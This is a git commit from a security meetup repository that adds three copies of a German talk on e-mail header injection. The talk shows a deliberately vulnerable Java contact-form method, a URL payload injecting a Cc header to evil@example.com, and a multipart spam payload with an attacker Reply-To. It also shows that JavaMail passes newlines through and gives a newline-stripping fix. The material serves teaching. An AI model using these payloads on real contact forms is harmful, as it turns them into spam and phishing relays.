mirror of https://github.com/it-security-kassel-nordhessen/meetup.git
| 2018_05_16_25th/email-header-injection/mailheaderinjection.latex | ●●●●● patch | view | raw | blame | history | |
| 2018_05_16_25th/email-header-injection/mailheaderinjection.tpp.bin | ●●●●● patch | view | raw | blame | history | |
| 2018_05_16_25th/email-header-injection/mailheaderinjection.txt | ●●●●● patch | view | raw | blame | history | |
| 2018_05_16_25th/scriptless-attacks/scriptless-attacks.pdf | patch | view | raw | blame | history |
2018_05_16_25th/email-header-injection/mailheaderinjection.latex
New file @@ -0,0 +1,150 @@ % Filename: tpp.tex % Purpose: template file for tpp latex export % Authors: (c) Andreas Gredler, Michael Prokop http://grml.org/ % License: This file is licensed under the GPL v2. % Latest change: Fre Apr 15 20:34:37 CEST 2005 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \documentclass{beamer} \mode<presentation> { \usetheme{Montpellier} \setbeamercovered{transparent} } \usepackage[german]{babel} \usepackage{umlaut} \usepackage[latin1]{inputenc} \usepackage{times} \usepackage[T1]{fontenc} \title[ E-Mail Header Injection]{ E-Mail Header Injection} \begin{document} \begin{frame}[fragile] \begin{verbatim} \author{Steve Ulrich, Micromata GmbH} \end{verbatim} \end{frame} \section{Just Another Injection} \begin{frame}[fragile] \begin{verbatim} \title[Die Inspiration]{Die Inspiration} public void sendContactForm(String subject, String content) { String template = "From: "+user.getEmail()+"\n"+ "To: "+contactEmail +"\n"+ "Subject: "+subject+"\n"+ "\n"+ content; sendEmail(template); } \title[Das Problem]{Das Problem} http://xxx/sendContactForm ?subject=sometext%0ACc%3A+evil%40example.com &text=sometext \title[Das Resultat]{Das Resultat} From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com sometext \title[Also nur eine Injection Lücke?]{Also nur eine Injection Lücke?} Nutzen wir also eine API (JavaMail), die wird uns schon schützen! Letzte Worte eines Entwicklers \title[JavaMail to the R...]{JavaMail to the R...} String subject = "sometext\nevil@example.com"; final MimeMessage msg = .. msg.setSender(new InternetAddress(user.getEmail())); msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); msg.setSubject(subject); msg.setText("BlahBlah"); \title[JavaMail to the R...WTF]{JavaMail to the R...WTF} From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com BlahBlah \title[Ein Bug?]{Ein Bug?} Es exitiert ein Issue: CSNC-2014-001 The assessment from our engineering team is that this is not a bug in JavaMail API. The application is responsible to perform some input validation. In this particular case, the application is responsible for ensuring that the subject string does not contain any line breaks. The code demonstrated the issue is not an Oracle sample. Therefore, we are closing the issue as not-a-bug. Oracle \title[Validierung]{Validierung} Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". Keine Regel ohne Ausnahme subject.replaceAll("[\\n\\r]+", " "); \title[Spaß mit Header Injection]{Spaß mit Header Injection} String subject = "Test" // This will be the subject + "\n" + "\nEvil content" From: user@example.com To: contact@example.com Subject: sometext Evil Content BlahBlah \title[Multipart injection]{Multipart injection} String subject = "Cheap Viagra" + "\nReply-To:attacker@example.com" // Man bittet um Antwort + "\nMIME-Version: 1.0" // Content-Header + "\nContent-Type: multipart/mixed; boundary=frontier" + "\n" // Empty line separates the Content! + "\n--frontier" + "\nContent-Type: text/plain\n" // Oder Fancy HTML? + "\nBilliges Viagra" // So günstig + "\n--frontier" + "\nContent-Type: text/nonsense" // jetzt den alten Content raus + "\n" // Empty line separates the Content! \end{verbatim} \end{frame} \end{document} %%%%% END OF FILE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 2018_05_16_25th/email-header-injection/mailheaderinjection.tpp.bin
New file @@ -0,0 +1,155 @@ --title E-Mail Header Injection --author Steve Ulrich, Micromata GmbH --heading Just Another Injection --newpage --title Die Inspiration --beginoutput public void sendContactForm(String subject, String content) { String template = "From: "+user.getEmail()+"\n"+ "To: "+contactEmail +"\n"+ "Subject: "+subject+"\n"+ "\n"+ content; sendEmail(template); } --endoutput --newpage --title Das Problem --beginoutput http://xxx/sendContactForm --color red ?subject=sometext%0ACc%3A+evil%40example.com --color white &text=sometext --endoutput --newpage --title Das Resultat --beginoutput From: user@example.com To: contact@example.com Subject: sometext --color red Cc: evil@example.com --color white sometext --endoutput --newpage --title Also nur eine Injection Lücke? Nutzen wir also eine API (JavaMail), die wird uns schon schützen! --- --right Letzte Worte eines Entwicklers --newpage --title JavaMail to the R... --beginoutput --color red String subject = "sometext\nevil@example.com"; --color white final MimeMessage msg = .. msg.setSender(new InternetAddress(user.getEmail())); msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); --color green msg.setSubject(subject); --color white msg.setText("BlahBlah"); --endoutput --newpage --title JavaMail to the R...WTF --beginoutput From: user@example.com To: contact@example.com Subject: sometext --color red Cc: evil@example.com --color white BlahBlah --endoutput --newpage --title Ein Bug? Es exitiert ein Issue: CSNC-2014-001 --- --beginoutput The assessment from our engineering team is that this is not a bug in JavaMail API. The application is responsible to perform some input validation. In this particular case, the application is responsible for ensuring that the subject string does not contain any line breaks. The code demonstrated the issue is not an Oracle sample. Therefore, we are closing the issue as not-a-bug. --endoutput --right Oracle --newpage --title Validierung Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". --- --center Keine Regel ohne Ausnahme --beginoutput subject.replaceAll("[\\n\\r]+", " "); --endoutput --newpage --title Spaß mit Header Injection --beginoutput String subject = "Test" // This will be the subject --color red + "\n" + "\nEvil content" --color white --endoutput --- --beginoutput From: user@example.com To: contact@example.com Subject: sometext --color red Evil Content --color white BlahBlah --endoutput --newpage --title Multipart injection --beginoutput String subject = "Cheap Viagra" + "\nReply-To:attacker@example.com" // Man bittet um Antwort --color red + "\nMIME-Version: 1.0" // Content-Header + "\nContent-Type: multipart/mixed; boundary=frontier" --color white + "\n" // Empty line separates the Content! --color red + "\n--frontier" + "\nContent-Type: text/plain\n" // Oder Fancy HTML? --color white + "\nBilliges Viagra" // So günstig --color red + "\n--frontier" + "\nContent-Type: text/nonsense" // jetzt den alten Content raus --color white + "\n" // Empty line separates the Content! --endoutput 2018_05_16_25th/email-header-injection/mailheaderinjection.txt
New file @@ -0,0 +1,127 @@ Title: E-Mail Header Injection Author: Steve Ulrich, Micromata GmbH Just Another Injection ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Title: Die Inspiration .--------------------------- | public void sendContactForm(String subject, String content) { | String template = | "From: "+user.getEmail()+"\n"+ | "To: "+contactEmail +"\n"+ | "Subject: "+subject+"\n"+ | "\n"+ | content; | sendEmail(template); | } `--------------------------- Title: Das Problem .--------------------------- | http://xxx/sendContactForm | ?subject=sometext%0ACc%3A+evil%40example.com | &text=sometext `--------------------------- Title: Das Resultat .--------------------------- | From: user@example.com | To: contact@example.com | Subject: sometext | Cc: evil@example.com | | sometext `--------------------------- Title: Also nur eine Injection Lücke? Nutzen wir also eine API (JavaMail), die wird uns schon schützen! Letzte Worte eines Entwicklers Title: JavaMail to the R... .--------------------------- | String subject = "sometext\nevil@example.com"; | | final MimeMessage msg = .. | msg.setSender(new InternetAddress(user.getEmail())); | msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); | msg.setSubject(subject); | msg.setText("BlahBlah"); `--------------------------- Title: JavaMail to the R...WTF .--------------------------- | From: user@example.com | To: contact@example.com | Subject: sometext | Cc: evil@example.com | | BlahBlah `--------------------------- Title: Ein Bug? Es exitiert ein Issue: CSNC-2014-001 .--------------------------- | The assessment from our engineering team is that this is not a bug in JavaMail | API. The application is responsible to perform some input validation. In this | particular case, the application is responsible for ensuring that the subject | string does not contain any line breaks. The code demonstrated the issue is not | an Oracle sample. Therefore, we are closing the issue as not-a-bug. `--------------------------- Oracle Title: Validierung Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". Keine Regel ohne Ausnahme .--------------------------- | subject.replaceAll("[\\n\\r]+", " "); `--------------------------- Title: Spaß mit Header Injection .--------------------------- | String subject = "Test" // This will be the subject | + "\n" | + "\nEvil content" `--------------------------- .--------------------------- | From: user@example.com | To: contact@example.com | Subject: sometext | | Evil Content | | BlahBlah `--------------------------- Title: Multipart injection .--------------------------- | String subject = "Cheap Viagra" | + "\nReply-To:attacker@example.com" // Man bittet um Antwort | + "\nMIME-Version: 1.0" // Content-Header | + "\nContent-Type: multipart/mixed; boundary=frontier" | + "\n" // Empty line separates the Content! | + "\n--frontier" | + "\nContent-Type: text/plain\n" // Oder Fancy HTML? | + "\nBilliges Viagra" // So günstig | + "\n--frontier" | + "\nContent-Type: text/nonsense" // jetzt den alten Content raus | + "\n" // Empty line separates the Content! `--------------------------- 2018_05_16_25th/scriptless-attacks/scriptless-attacks.pdfBinary files differ
